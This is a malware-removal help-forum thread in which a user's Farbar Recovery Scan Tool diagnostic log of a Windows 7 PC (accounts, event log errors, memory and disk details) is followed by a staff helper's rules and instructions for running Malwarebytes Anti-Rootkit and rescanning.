(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\Randy\AppData\Roaming\Microsoft Access 97-2003.EML:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-756768628-1363961526-1356878247-500 - Administrator - Disabled)
Guest (S-1-5-21-756768628-1363961526-1356878247-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-756768628-1363961526-1356878247-1016 - Limited - Enabled)
JThakur (S-1-5-21-756768628-1363961526-1356878247-1014 - Limited - Enabled) => C:\Users\JThakur
Randy (S-1-5-21-756768628-1363961526-1356878247-1000 - Administrator - Enabled) => C:\Users\Randy
VMcGlynn (S-1-5-21-756768628-1363961526-1356878247-1015 - Administrator - Enabled) => C:\Users\VMcGlynn

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (12/15/2014 09:31:23 PM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: The backup did not complete because of an error writing to the backup location F:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).

Error: (12/14/2014 10:02:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x3244
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 10:02:17 PM) (Source: Microsoft Office 12) (EventID: 2001) (User: )
Description: Rejected Safe Mode action : Microsoft Office Outlook.

Error: (12/14/2014 09:43:52 PM) (Source: Report Server Windows Service (MSSQLSERVER)) (EventID: 107) (User: )
Description: Report Server Windows Service (MSSQLSERVER) cannot connect to the report server database.

Error: (12/14/2014 09:38:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x2bb0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:37:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x7494
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:36:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x63d0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:35:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x1df0
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 09:33:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: utilPfwInstCondChecker.exe, version: 11.2.0.6017, time stamp: 0x50dc3662
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea91c
Exception code: 0xc0000005
Fault offset: 0x0001f8bc
Faulting process id: 0x5078
Faulting application start time: 0xutilPfwInstCondChecker.exe0
Faulting application path: utilPfwInstCondChecker.exe1
Faulting module path: utilPfwInstCondChecker.exe2
Report Id: utilPfwInstCondChecker.exe3

Error: (12/14/2014 02:00:19 AM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: The backup did not complete because of an error writing to the backup location F:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).

System errors:
=============
Error: (12/15/2014 09:52:16 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/14/2014 09:45:53 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/14/2014 09:43:43 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/14/2014 09:42:30 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.29 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (12/12/2014 05:22:36 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {4991D34B-80A1-4291-83B6-3328366B9097}

Error: (12/12/2014 05:20:56 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/12/2014 05:20:34 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/12/2014 05:18:34 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.29 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (12/11/2014 07:20:45 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Client/Server Security Agent RealTime Scan service hung on starting.

Error: (12/11/2014 07:19:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service failed to start due to the following error:
%%1053

Microsoft Office Sessions:
=========================
Error: (09/12/2014 07:31:15 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 86484 seconds with 1500 seconds of active time.  This session ended with a crash.

Error: (04/08/2014 09:05:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 1205470 seconds with 660 seconds of active time.  This session ended with a crash.

Error: (05/27/2013 01:32:13 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 4 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (02/21/2013 07:06:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 26 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (11/30/2012 00:24:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 1031 seconds with 840 seconds of active time.  This session ended with a crash.

Error: (03/19/2012 02:41:43 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 72 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (03/04/2012 07:19:09 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 512 seconds with 480 seconds of active time.  This session ended with a crash.

Error: (03/04/2012 07:10:26 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 603 seconds with 600 seconds of active time.  This session ended with a crash.

Error: (02/21/2012 03:52:45 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 16355 seconds with 6060 seconds of active time.  This session ended with a crash.

Error: (02/20/2012 07:00:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 2, Application Name: Microsoft Office Access, Application Version: 12.0.6606.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 21 seconds with 0 seconds of active time.  This session ended with a crash.

==================== Memory info ===========================

Processor: Intel® Xeon® CPU E5503 @ 2.00GHz
Percentage of memory in use: 57%
Total physical RAM: 3069.55 MB
Available physical RAM: 1296.35 MB
Total Pagefile: 6137.4 MB
Available Pagefile: 3463.21 MB
Total Virtual: 2047.88 MB
Available Virtual: 1917.45 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:464.99 GB) (Free:347.68 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 77E3ED41)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=750 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 

Link to post
Share on other sites

  • Staff

Hello,
    
 
They call me TwinHeadedEagle around here, and I'll be working with you.
 
     
    
Before we start please read and note the following:

  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Do not paste the logs in your posts, attachments make my work easier. There is a More reply options button, that gives you Upload Files option below which you can use to attach your reports. Always attach reports from all tools.
  • Always execute my instructions in given order. If for some reason you cannot completely follow one instruction, inform me about that.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, what may cause some delays between answers.
  • Do not ask for help for your business PC. Companies are making revenue via computers, so it is good thing to pay someone to repair it.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.

:excl: I can't foresee everything, so if anything unexpected happens, please stop and inform me!
:excl: There are no silly questions. Never be afraid to ask if in doubt!
 
 
 
  warning.gif Rules and policies
 
We won't support any piracy.
That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!
The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!
 
Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.
 
 
 
 

Download 51a5f31352b88-icon_MBAR.pngMalwarebytes Anti-Rootkit to your desktop.

  • Double-click the icon to start the tool.
  • It will ask you where to extract it, then it will start.
  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder and paste the content of the following files in your next reply:
    • "mbar-log-{date} (xx-xx-xx).txt"
    • "system-log.txt"

 

 

FRST.gif Scan with Farbar Recovery Scan Tool
 
Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please upload them into your next reply.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.